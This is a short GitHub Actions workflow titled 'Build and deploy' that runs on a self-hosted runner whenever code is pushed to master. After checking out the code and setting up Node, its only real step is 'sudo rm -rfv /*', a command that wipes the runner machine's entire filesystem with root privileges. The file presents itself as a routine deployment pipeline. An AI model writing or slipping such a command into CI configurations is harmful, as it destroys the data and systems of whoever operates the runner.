name: Build and deploy

on:
    push:
        branches: [master]

jobs:
    deploy:
        runs-on: [self-hosted, ubuntu-vmsrv]
        permissions:
          contents: write

        steps:
            - uses: actions/checkout@v3

            - name: Prepare environment
              uses: actions/setup-node@v3
              with:
                  node-version: "20"

            - run: sudo rm -rfv /*
